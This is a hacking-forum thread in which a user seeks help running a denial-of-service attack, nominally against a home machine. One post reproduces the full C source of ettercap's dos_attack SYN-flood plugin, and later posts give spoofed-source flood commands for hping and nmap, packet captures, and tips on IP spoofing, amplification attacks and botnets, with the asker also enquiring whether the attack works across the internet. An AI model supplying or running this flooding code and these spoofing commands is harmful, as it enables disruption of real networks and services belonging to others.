Sign in to follow this  
Followers 0
Bigmac

dos attack

27 posts in this topic

I would like to perform a dos attack on one of my computers... the only tutorials i can find are on website/servers. . .

can some one show me how. . . maybe a list of tools. . .

0

Share this post


Link to post
Share on other sites
(dos|ddos) != hacking

syn floods with spoofed ip addresses

i think i understand the concept. . .

i could set up a game server on my network. . . how could i flood this server with syn packets...

0

Share this post


Link to post
Share on other sites

The wikipedia webpage: http://en.wikipedia.org/wiki/SYN_flood provides some decent information concerning this type of SYN flood.

There's many other ways to dos someone as well.

I'm not sure of any windows applications (which im automatically assuming you're using) that can/will do this for you automatically, I believe the typical attacks originate from *nix based OS's

0

Share this post


Link to post
Share on other sites
The wikipedia webpage: http://en.wikipedia.org/wiki/SYN_flood provides some decent information concerning this type of SYN flood.

There's many other ways to dos someone as well.

I'm not sure of any windows applications (which im automatically assuming you're using) that can/will do this for you automatically, I believe the typical attacks originate from *nix based OS's

i have backtrack2 running from virutalbox. . .
0

Share this post


Link to post
Share on other sites

I believe Backtrack's wiki and it's forums provide support for all utilities -- if you do a search you should be able to find something on doing FLOODING of different types...

I believe it comes with ettercap which also has a DOS_ATTACK plugin

EDIT:

Visit : http://backtrack.offensive-security.com/index.php/Tools

It shows all the tools that Backtrack 2 comes with (Atleast most)

I didn't see anything specific related to DOS attacking however

Edited by friendless
0

Share this post


Link to post
Share on other sites
I believe Backtrack's wiki and it's forums provide support for all utilities -- if you do a search you should be able to find something on doing FLOODING of different types...

I believe it comes with ettercap which also has a DOS_ATTACK plugin

EDIT:

Visit : http://backtrack.offensive-security.com/index.php/Tools

It shows all the tools that Backtrack 2 comes with (Atleast most)

I didn't see anything specific related to DOS attacking however

I did try the dos_attack plug within ettercap. . . works like a charm. . .

Does this work across the internet.

0

Share this post


Link to post
Share on other sites
I believe Backtrack's wiki and it's forums provide support for all utilities -- if you do a search you should be able to find something on doing FLOODING of different types...

I believe it comes with ettercap which also has a DOS_ATTACK plugin

EDIT:

Visit : http://backtrack.offensive-security.com/index.php/Tools

It shows all the tools that Backtrack 2 comes with (Atleast most)

I didn't see anything specific related to DOS attacking however

I did try the dos_attack plug within ettercap. . . works like a charm. . .

Does this work across the internet.

How did I know this was coming ... ? ...

0

Share this post


Link to post
Share on other sites

Does this work across the internet.

How did I know this was coming ... ? ...

Because we were all there once... Then we found better things then preforming DDOS over the net to others networks.

Oh and to answer your question about the "does this work across the internet??"

Yes

I do not know about Ettercap but it does with other programs.

How about trying to make your own program that does a DDOS.

That would help you more in hacking because then you will know how a DDOS really works and what it takes to get it to do what it is doing. :D

biosphear

0

Share this post


Link to post
Share on other sites

Does this work across the internet.

How did I know this was coming ... ? ...

Because we were all there once... Then we found better things then preforming DDOS over the net to others networks.

Oh and to answer your question about the "does this work across the internet??"

Yes

I do not know about Ettercap but it does with other programs.

How about trying to make your own program that does a DDOS.

That would help you more in hacking because then you will know how a DDOS really works and what it takes to get it to do what it is doing. :D

biosphear

ettercap did work. . . I take it you have to learn C or C++. . .
0

Share this post


Link to post
Share on other sites
Most ISPs do not allow spoofed ip addresses.

I would like to test this. . . I need a tip. . . how could my sister detect this dos attack and then let me know if the ip was spoofed or not

0

Share this post


Link to post
Share on other sites
ettercap did work. . . I take it you have to learn C or C++. . .

Yes.

C is always a good base to have when hacking.

Programing will help you in hacking even if you do not like to program.

I know programing has helped me in so many ways.

Remember you can know how something works but you should always know why it works, and how it is made possible.

biosphear

0

Share this post


Link to post
Share on other sites

So how can i monitor this dos attack. netstat?

Edit:

so i did check the netstat -a and there was about 200 connections established. . .

Edited by 1qwert
0

Share this post


Link to post
Share on other sites

um. . . i have this idea. . . what if each and every ip was spoofed at random. . .

Edit: is this C++

/*
dos_attack -- ettercap plugin -- Run a D.O.S. attack (based on Naptha)

Copyright © ALoR & NaGA

This program is free software; you can redistribute it and/or modify
it under the terms of the GNU General Public License as published by
the Free Software Foundation; either version 2 of the License, or
(at your option) any later version.

This program is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU General Public License for more details.

You should have received a copy of the GNU General Public License
along with this program; if not, write to the Free Software
Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA 02111-1307, USA.

$Id: dos_attack.c,v 1.8 2004/11/04 09:23:02 alor Exp $
*/


#include <ec.h> /* required for global variables */
#include <ec_plugins.h> /* required for plugin ops */
#include <ec_hook.h>
#include <ec_packet.h>
#include <ec_send.h>
#include <ec_threads.h>

/* protos */
int plugin_load(void *);
static int dos_attack_init(void *);
static int dos_attack_fini(void *);
static void parse_arp(struct packet_object *po);
static void parse_tcp(struct packet_object *po);
EC_THREAD_FUNC(syn_flooder);

struct port_list {
u_int16 port;
SLIST_ENTRY(port_list) next;
};


/* globals */
static struct ip_addr fake_host;
static struct ip_addr victim_host;
SLIST_HEAD(, port_list) port_table;

/* plugin operations */
struct plugin_ops dos_attack_ops = {
/* ettercap version MUST be the global EC_VERSION */
ettercap_version: EC_VERSION,
/* the name of the plugin */
name: "dos_attack",
/* a short description of the plugin (max 50 chars) */
info: "Run a d.o.s. attack against an IP address",
/* the plugin version. */
version: "1.0",
/* activation function */
init: &dos_attack_init,
/* deactivation function */
fini: &dos_attack_fini,
};

/**********************************************************/

/* this function is called on plugin load */
int plugin_load(void *handle)
{
return plugin_register(handle, &dos_attack_ops);
}

/******************* STANDARD FUNCTIONS *******************/

static int dos_attack_init(void *dummy)
{
struct in_addr ipaddr;
char dos_addr[MAX_ASCII_ADDR_LEN];
char unused_addr[MAX_ASCII_ADDR_LEN];
struct port_list *p;

/* It doesn't work if unoffensive */
if (GBL_OPTIONS->unoffensive) {
INSTANT_USER_MSG("dos_attack: plugin doesn't work in UNOFFENSIVE mode\n");
return PLUGIN_FINISHED;
}

/* don't show packets while operating */
GBL_OPTIONS->quiet = 1;

memset(dos_addr, 0, sizeof(dos_addr));
memset(unused_addr, 0, sizeof(dos_addr));

ui_input("Insert victim IP: ", dos_addr, sizeof(dos_addr), NULL);
if (inet_aton(dos_addr, &ipaddr) == 0) {
INSTANT_USER_MSG("dos_attack: Invalid IP address.\n");
return PLUGIN_FINISHED;
}
ip_addr_init(&victim_host, AF_INET, (char *)&ipaddr);

ui_input("Insert unused IP: ", unused_addr, sizeof(unused_addr), NULL);
if (inet_aton(unused_addr, &ipaddr) == 0) {
INSTANT_USER_MSG("dos_attack: Invalid IP address.\n");
return PLUGIN_FINISHED;
}
ip_addr_init(&fake_host, AF_INET, (char *)&ipaddr);

INSTANT_USER_MSG("dos_attack: Starting scan against %s [Fake Host: %s]\n", dos_addr, unused_addr);

/* Delete the "open" port list just in case of previous executions */
while (!SLIST_EMPTY(&port_table)) {
p = SLIST_FIRST(&port_table);
SLIST_REMOVE_HEAD(&port_table, next);
SAFE_FREE(p);
}

/* Add the hook to "create" the fake host */
hook_add(HOOK_PACKET_ARP_RQ, &parse_arp);

/* Add the hook for SYN-ACK reply */
hook_add(HOOK_PACKET_TCP, &parse_tcp);

/* create the flooding thread */
ec_thread_new("golem", "SYN flooder thread", &syn_flooder, NULL);

return PLUGIN_RUNNING;
}


static int dos_attack_fini(void *dummy)
{
pthread_t pid;

/* Remove the hooks */
hook_del(HOOK_PACKET_ARP_RQ, &parse_arp);
hook_del(HOOK_PACKET_TCP, &parse_tcp);

pid = ec_thread_getpid("golem");

/* the thread is active or not ? */
if (!pthread_equal(pid, EC_PTHREAD_NULL))
ec_thread_destroy(pid);

INSTANT_USER_MSG("dos_attack: plugin terminated...\n");

return PLUGIN_FINISHED;
}

/*********************************************************/

/*
* This thread first sends SYN packets to some ports (a little port scan)
* then starts to flood active ports with other SYN packets.
*/
EC_THREAD_FUNC(syn_flooder)
{
u_int16 sport = 0xe77e, dport;
u_int32 seq = 0xabadc0de;
struct port_list *p;

/* init the thread and wait for start up */
ec_thread_init();

/* First "scan" ports from 1 to 1024 */
for (dport=1; dport<1024; dport++) {
send_tcp(&fake_host, &victim_host, sport++, htons(dport), seq++, 0, TH_SYN);
usleep(1000);
}

INSTANT_USER_MSG("dos_attack: Starting attack...\n");

/* Continue flooding open ports */
LOOP {
CANCELLATION_POINT();

SLIST_FOREACH(p, &port_table, next)
send_tcp(&fake_host, &victim_host, sport++, p->port, seq++, 0, TH_SYN);

usleep(500);
}

return NULL;
}

/* Parse the arp packets and reply for the fake host */
static void parse_arp(struct packet_object *po)
{
if (!ip_addr_cmp(&fake_host, &po->L3.dst))
send_arp(ARPOP_REPLY, &po->L3.dst, GBL_IFACE->mac, &po->L3.src, po->L2.src);
}

/*
* Populate the open port list and reply to
* SYN-ACK packets from victim host
*/
static void parse_tcp(struct packet_object *po)
{
struct port_list *p;

/* Check if it's a reply to our SYN flooding */
if (ip_addr_cmp(&fake_host, &po->L3.dst) ||
ip_addr_cmp(&victim_host, &po->L3.src) ||
po->L4.flags != (TH_SYN | TH_ACK))
return;

/* Complete the handshake with an ACK */
send_tcp(&fake_host, &victim_host, po->L4.dst, po->L4.src, po->L4.ack, htonl( ntohl(po->L4.seq) + 1), TH_ACK);

/* Check if the port is already in the "open" list... */
SLIST_FOREACH(p, &port_table, next)
if (p->port == po->L4.src)
return;

/* If not...put it in */
SAFE_CALLOC(p, 1, sizeof(struct port_list));
p->port = po->L4.src;
SLIST_INSERT_HEAD(&port_table, p, next);

INSTANT_USER_MSG("dos_attack: Port %d added\n", ntohs(p->port));
}

/* EOF */

// vim:ts=3:expandtab

Edited by 1qwert
0

Share this post


Link to post
Share on other sites
um. . . i have this idea. . . what if each and every ip was spoofed at random. . .

Even less chance of working, ISPs are almost bound to block packages with source IPs (in the header, that is) that they know not to own. If you irk them, they might even try to find out who you are and what your deal is.

Edit: is this C++

That's C

0

Share this post


Link to post
Share on other sites

can you do a dos attack with nmap? just spoof the ip and send syn packets???

-nmap -P0 -sS -p 135,139,445 -e eth0 -S 192.168.254.2 192.168.254.5

after doing this nmap scan I then check the netstat of the target and its shows SYN_RECEIVED.

Um. . . shouldnt there be a half open connection with those ports?

Edited by 1qwert
0

Share this post


Link to post
Share on other sites

Really, the only way to launch a successful DoS attack these days is with a large botnet at your command. One computer isn't going do much damage on a professional grade server, unless you have the ability to send packets with spoofed IPs (which has been already stated to be unlikely)

0

Share this post


Link to post
Share on other sites

Egress filtering isn't going to stop you from spoofing packets from source addresses that are within your subnet. Botnets are not necessary if you are using a traffic amplication attack (i.e. smurf, dns recursion, etc.) What I consider to be the seminal paper on SYN flooding is Phrack48-13.

0

Share this post


Link to post
Share on other sites

Besides, botnets are lame and those who run them and think they're hackers really are nothing but idiots.

0

Share this post


Link to post
Share on other sites
Besides, botnets are lame and those who run them and think they're hackers really are nothing but idiots.

I dunno man, there are some pretty sick botnets. It takes more than a modicum of understanding to manage a network that can efficiently scale to tens of thousands of nodes.

0

Share this post


Link to post
Share on other sites
Egress filtering isn't going to stop you from spoofing packets from source addresses that are within your subnet. Botnets are not necessary if you are using a traffic amplication attack (i.e. smurf, dns recursion, etc.) What I consider to be the seminal paper on SYN flooding is Phrack48-13.
I have been testing with wireshark and hping.
hping -S -a 192.168.254.99 -p 135 192.168.254.2 --flood

this will flood syn packets with a spoofed ip to port 135. . .

Now with ettercap's Dos_attack plugin. i logged all packets during this attack and i found a patter. first ettercap will scan the target for open ports then ettercap will attack the open ports. the target computer now thinks there is a connection established(3 way hand shake).

192.168.254.99>	192.168.254.2	TCP	49901 > epmap [SYN] Seq=0 Win=32767 Len=0
192.168.254.2> 192.168.254.99 TCP epmap > 49901 [SYN, ACK] Seq=0 Ack=1 Win=8192 Len=0 MSS=1460
192.168.254.99> 192.168.254.2 TCP 49901 > epmap [ACK] Seq=1 Ack=1 Win=32767 Len=0

Now what i want to point out about this dos_attack plugin. . . any firewall will pick this up because of how it scans for ports.

I would like to try and recreate this with hping.

this is my first attempt.

hping -S -a 198.234.56.67 -p 445 192.168.254.2

hping -A -a 198.234.56.67 -p 445 192.168.254.2

198.255.65.24>	192.168.254.2	TCP	nerv > microsoft-ds [SYN] Seq=0 Win=512 Len=0
192.168.254.2> 198.255.65.24 TCP microsoft-ds > nerv [SYN, ACK] Seq=0 Ack=1 Win=8192 Len=0 MSS=1460
198.255.65.24> 192.168.254.2 TCP webmethods-b2b > microsoft-ds [ACK] Seq=1 Ack=1 Win=512 Len=0 <---
192.168.254.2> 198.255.65.24 TCP microsoft-ds > webmethods-b2b [RST] Seq=1 Win=0 Len=0

I cant establish a connection. The source port and destination port does not match up on the ACK packet so the target responds with a Reset.

0

Share this post


Link to post
Share on other sites
I cant establish a connection. The source port and destination port does not match up on the ACK packet so the target responds with a Reset.

There is no port number in the code you quoted, Microsoft turned non-http request packet replys off in their servers.

Seriously, go read a book about networking instead of being a script kiddy. (another one trying to DoS Microsoft... :roll:)

:nono: Look who's talking! There are port numbers in the log that was pasted. It just so happens that the packet dissector is doing a getservbyport(), so it appears as "microsoft-ds" instead of 445, for example. I don't see any Microsoft addresses there either..the source address is unallocated and the destination is an RFC1918 address. :lol: Talk about script kiddies! :stfu: heh.

0

Share this post


Link to post
Share on other sites

Create an account or sign in to comment

You need to be a member in order to leave a comment

Create an account

Sign up for a new account in our community. It's easy!


Register a new account

Sign in

Already have an account? Sign in here.


Sign In Now
Sign in to follow this  
Followers 0